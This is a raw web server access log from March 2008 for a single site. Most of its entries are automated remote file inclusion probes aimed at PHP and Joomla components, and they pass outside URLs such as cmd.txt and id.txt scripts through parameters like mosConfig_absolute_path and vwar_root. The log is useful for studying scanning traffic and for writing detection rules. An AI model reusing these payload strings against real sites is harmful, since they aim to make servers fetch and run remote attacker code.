209.62.67.82 - - [04/Mar/2008:07:22:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:22:07 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:22:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:22:09 -0800] "GET /logs/access_080117.log//login.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:22:11 -0800] "GET //login.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:22:11 -0800] "GET /logs//login.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:22:15 -0800] "GET /logs/access_080211.log//login.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:07:22:22 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.17.201.147 - - [04/Mar/2008:07:22:23 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:07:22:23 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:07:22:23 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:07:22:46 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:07:23:35 -0800] "GET /index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:07:23:41 -0800] "GET /logs/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:07:23:43 -0800] "GET /index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:07:23:43 -0800] "GET /logs/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:23:54 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://albinfo.freehostia.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:23:58 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:23:59 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.77.209.86 - - [04/Mar/2008:07:24:14 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:24:18 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.180.216.43 - - [04/Mar/2008:07:24:30 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.180.216.43 - - [04/Mar/2008:07:24:32 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.180.216.43 - - [04/Mar/2008:07:24:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:07:24:34 -0800] "GET ///mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:07:24:34 -0800] "GET /logs///mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:07:24:45 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:07:24:45 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.134.252.251 - - [04/Mar/2008:07:24:51 -0800] "GET /logs/access.log/?vsdragonrootpath=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.251 - - [04/Mar/2008:07:24:52 -0800] "GET /?vsdragonrootpath=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.251 - - [04/Mar/2008:07:24:52 -0800] "GET /logs/?vsdragonrootpath=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 37260 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:24:54 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:07:24:57 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:07:24:57 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:07:24:58 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:07:25:07 -0800] "GET /logs/access_080131.log//index.php?s=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:07:25:08 -0800] "GET //index.php?s=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:07:25:08 -0800] "GET /logs//index.php?s=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:25:10 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.17.26.135 - - [04/Mar/2008:07:25:33 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
212.17.26.135 - - [04/Mar/2008:07:25:33 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.21.134.242 - - [04/Mar/2008:07:25:48 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.21.134.242 - - [04/Mar/2008:07:25:48 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:25:58 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:25:58 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:26:03 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.86.119 - - [04/Mar/2008:07:26:14 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [04/Mar/2008:07:26:15 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [04/Mar/2008:07:26:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:26:32 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:26:32 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:26:33 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.104.248.62 - - [04/Mar/2008:07:26:46 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.81.28 - - [04/Mar/2008:07:26:47 -0800] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [04/Mar/2008:07:26:47 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [04/Mar/2008:07:26:47 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.104.248.62 - - [04/Mar/2008:07:26:55 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:07:27:12 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:07:27:12 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:07:27:13 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:07:27:13 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:07:27:16 -0800] "GET /logs/access_080201.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:07:27:55 -0800] "GET //index.php?s=http://t78.net/images/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:07:28:02 -0800] "GET /logs/access_080211.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:07:28:10 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:07:28:25 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:07:28:26 -0800] "GET /convert/mvcw.php?vwar_root=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:07:28:31 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:07:28:31 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
205.134.252.251 - - [04/Mar/2008:07:29:10 -0800] "GET /logs/access_080130.log/?vsdragonrootpath=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.99.2.85 - - [04/Mar/2008:07:29:21 -0800] "GET /index.php?x=http://ewo.sufx.net/electro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.145.200 - - [04/Mar/2008:07:29:50 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.200 - - [04/Mar/2008:07:29:54 -0800] "GET /minamijewelry/source_images/batch1/ HTTP/1.0" 200 5016 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:29:57 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:30:09 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:30:09 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.28 - - [04/Mar/2008:07:30:22 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://onf.no/pics/2008/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.219 - - [04/Mar/2008:07:30:55 -0800] "GET /logs/access_080127.log HTTP/1.0" 200 672308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:31:07 -0800] "GET /index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:07:31:37 -0800] "GET /config.inc.php?path_escape=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:07:31:37 -0800] "GET /logs/config.inc.php?path_escape=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:31:49 -0800] "GET /logs/access_080103.log/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:31:50 -0800] "GET /logs/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:31:50 -0800] "GET /logs/access_080221.log/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:07:31:53 -0800] "GET /logs/access_080221.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:07:31:54 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:07:31:54 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:32:13 -0800] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [04/Mar/2008:07:32:15 -0800] "GET /logs/access_080131.log//index.php?s=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [04/Mar/2008:07:32:15 -0800] "GET //index.php?s=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [04/Mar/2008:07:32:15 -0800] "GET /logs//index.php?s=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:07:32:18 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:07:32:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:07:32:20 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:07:32:20 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:07:32:20 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:07:32:21 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.79.234.84 - - [04/Mar/2008:07:32:25 -0800] "GET /logs/access_080131.log//index.php?s=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.234.84 - - [04/Mar/2008:07:32:25 -0800] "GET //index.php?s=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.234.84 - - [04/Mar/2008:07:32:25 -0800] "GET /logs//index.php?s=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:32:38 -0800] "GET /index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:07:32:40 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:33:03 -0800] "GET /logs/access_080103.log/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:33:03 -0800] "GET /logs/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:33:03 -0800] "GET /logs/access_080221.log/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:33:32 -0800] "GET /logs/access_080120.log/!scanhttp://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:33:32 -0800] "GET /logs/!scanhttp://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:33:32 -0800] "GET /logs/access_071228.log/!scanhttp://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:07:33:36 -0800] "GET /index.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.188.13 - - [04/Mar/2008:07:33:40 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [04/Mar/2008:07:33:41 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:33:41 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.188.13 - - [04/Mar/2008:07:33:41 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
